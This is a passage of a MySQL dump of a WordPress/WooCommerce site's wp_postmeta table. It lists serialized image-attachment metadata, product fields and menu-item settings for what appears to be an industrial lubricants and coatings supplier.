:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto20528720-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto20528720-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (285, 144, '_wp_attached_file', '2016/08/canstockphoto21547617.jpg'); 
INSERT INTO `wp_postmeta` VALUES (286, 144, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:817;s:4:"file";s:33:"2016/08/canstockphoto21547617.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto21547617-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto21547617-800x409.jpg";s:5:"width";i:800;s:6:"height";i:409;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto21547617-768x392.jpg";s:5:"width";i:768;s:6:"height";i:392;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto21547617-1600x817.jpg";s:5:"width";i:1600;s:6:"height";i:817;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto21547617-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto21547617-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto21547617-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto21547617-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (287, 163, '_wp_attached_file', '2016/08/cropped-mslogo-1-e1471289515793.png'); 
INSERT INTO `wp_postmeta` VALUES (288, 163, '_wp_attachment_context', 'site-icon'); 
INSERT INTO `wp_postmeta` VALUES (289, 163, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:512;s:6:"height";i:512;s:4:"file";s:43:"2016/08/cropped-mslogo-1-e1471289515793.png";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"cropped-mslogo-1-e1471289515793-340x340.png";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:9:"image/png";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"cropped-mslogo-1-e1471289515793-250x250.png";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:9:"image/png";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"cropped-mslogo-1-e1471289515793-200x200.png";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:9:"image/png";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"cropped-mslogo-1-e1471289515793-225x225.png";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:9:"image/png";}s:11:"shop_single";a:4:{s:4:"file";s:43:"cropped-mslogo-1-e1471289515793-510x512.png";s:5:"width";i:510;s:6:"height";i:512;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (290, 4, '_edit_lock', '1471303862:1'); 
INSERT INTO `wp_postmeta` VALUES (291, 181, '_wp_attached_file', '2016/08/ptfe_lubricants.jpg'); 
INSERT INTO `wp_postmeta` VALUES (292, 181, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:450;s:4:"file";s:27:"2016/08/ptfe_lubricants.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"ptfe_lubricants-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"ptfe_lubricants-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"ptfe_lubricants-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"ptfe_lubricants-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"ptfe_lubricants-510x450.jpg";s:5:"width";i:510;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:12:"Mourad Fahmi";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:10:"1440018398";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (293, 182, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (294, 182, '_edit_lock', '1496666471:3'); 
INSERT INTO `wp_postmeta` VALUES (295, 183, '_wp_attached_file', '2016/08/release66.jpg'); 
INSERT INTO `wp_postmeta` VALUES (296, 183, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:400;s:6:"height";i:300;s:4:"file";s:21:"2016/08/release66.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"release66-340x300.jpg";s:5:"width";i:340;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"release66-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"release66-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"release66-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:12:"Mourad Fahmi";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:10:"1440625549";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (298, 182, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (299, 182, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (300, 182, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (301, 182, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (302, 182, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (303, 182, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (304, 182, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (305, 182, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (306, 182, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (307, 182, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (308, 182, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (309, 182, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (310, 182, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (311, 182, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (312, 182, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (313, 182, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (314, 182, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (315, 182, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (316, 182, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (317, 182, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (318, 182, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (319, 182, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (320, 182, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (321, 182, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (322, 182, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (323, 182, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (324, 182, '_product_image_gallery', '1796'); 
INSERT INTO `wp_postmeta` VALUES (325, 182, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (326, 182, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (327, 182, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (359, 190, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (360, 190, '_edit_lock', '1479958374:3'); 
INSERT INTO `wp_postmeta` VALUES (361, 190, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (362, 190, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (363, 190, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (364, 190, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (365, 190, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (366, 190, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (367, 190, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (368, 190, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (369, 190, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (370, 190, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (371, 190, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (372, 190, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (373, 190, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (374, 190, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (375, 190, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (376, 190, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (377, 190, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (378, 190, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (379, 190, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (380, 190, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (381, 190, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (382, 190, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (383, 190, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (384, 190, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (385, 190, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (386, 190, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (387, 190, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (388, 190, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (389, 190, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (390, 190, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (392, 191, '_wp_attached_file', '2016/08/conformal-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (393, 191, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:400;s:4:"file";s:23:"2016/08/conformal-2.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"conformal-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"conformal-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"conformal-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"conformal-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"conformal-2-510x400.jpg";s:5:"width";i:510;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:12:"Mourad Fahmi";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:10:"1440438810";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (395, 200, '_wp_attached_file', '2016/08/chemours-1-e1471343331813.png'); 
INSERT INTO `wp_postmeta` VALUES (396, 200, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:200;s:6:"height";i:57;s:4:"file";s:37:"2016/08/chemours-1-e1471343331813.png";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"chemours-1-e1471343331813-200x57.png";s:5:"width";i:200;s:6:"height";i:57;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (397, 201, '_wp_attached_file', '2016/08/chemours-4.png'); 
INSERT INTO `wp_postmeta` VALUES (398, 201, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:200;s:6:"height";i:57;s:4:"file";s:22:"2016/08/chemours-4.png";s:5:"sizes";a:1:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"chemours-4-200x57.png";s:5:"width";i:200;s:6:"height";i:57;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (399, 200, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:200;s:6:"height";i:57;s:4:"file";s:14:"chemours-1.png";}}'); 
INSERT INTO `wp_postmeta` VALUES (400, 204, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (401, 204, '_edit_lock', '1496344968:2'); 
INSERT INTO `wp_postmeta` VALUES (402, 204, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (403, 205, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (404, 205, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (405, 205, '_menu_item_object_id', '204'); 
INSERT INTO `wp_postmeta` VALUES (406, 205, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (407, 205, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (408, 205, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (409, 205, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (410, 205, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (411, 207, '_wp_attached_file', '2016/08/miller-building.jpg'); 
INSERT INTO `wp_postmeta` VALUES (412, 207, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:800;s:6:"height";i:400;s:4:"file";s:27:"2016/08/miller-building.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"miller-building-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"miller-building-800x400.jpg";s:5:"width";i:800;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"miller-building-768x384.jpg";s:5:"width";i:768;s:6:"height";i:384;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"miller-building-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"miller-building-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"miller-building-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"miller-building-510x400.jpg";s:5:"width";i:510;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:63;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (413, 209, '_wp_attached_file', '2016/08/about2-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (414, 209, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:355;s:6:"height";i:245;s:4:"file";s:20:"2016/08/about2-2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"about2-2-340x245.jpg";s:5:"width";i:340;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"about2-2-250x245.jpg";s:5:"width";i:250;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"about2-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"about2-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (415, 210, '_wp_attached_file', '2016/08/about5-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (416, 210, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:355;s:6:"height";i:245;s:4:"file";s:20:"2016/08/about5-2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"about5-2-340x245.jpg";s:5:"width";i:340;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"about5-2-250x245.jpg";s:5:"width";i:250;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"about5-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"about5-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (417, 211, '_wp_attached_file', '2016/08/about6-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (418, 211, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:355;s:6:"height";i:245;s:4:"file";s:20:"2016/08/about6-2.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:20:"about6-2-340x245.jpg";s:5:"width";i:340;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:20:"about6-2-250x245.jpg";s:5:"width";i:250;s:6:"height";i:245;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:20:"about6-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:20:"about6-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (419, 214, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (420, 214, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (421, 214, '_menu_item_object_id', '204'); 
INSERT INTO `wp_postmeta` VALUES (422, 214, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (423, 214, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (424, 214, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (425, 214, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (426, 214, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (428, 218, '_wp_attached_file', '2016/08/miller-1-1-e1471534801717.jpg'); 
INSERT INTO `wp_postmeta` VALUES (429, 218, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:800;s:6:"height";i:400;s:4:"file";s:37:"2016/08/miller-1-1-e1471534801717.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"miller-1-1-e1471534801717-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"miller-1-1-e1471534801717-800x400.jpg";s:5:"width";i:800;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"miller-1-1-e1471534801717-768x384.jpg";s:5:"width";i:768;s:6:"height";i:384;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"miller-1-1-e1471534801717-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"miller-1-1-e1471534801717-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"miller-1-1-e1471534801717-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"miller-1-1-e1471534801717-510x400.jpg";s:5:"width";i:510;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:75;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (430, 233, '_wp_attached_file', '2016/08/Medical-Home-Page.jpg'); 
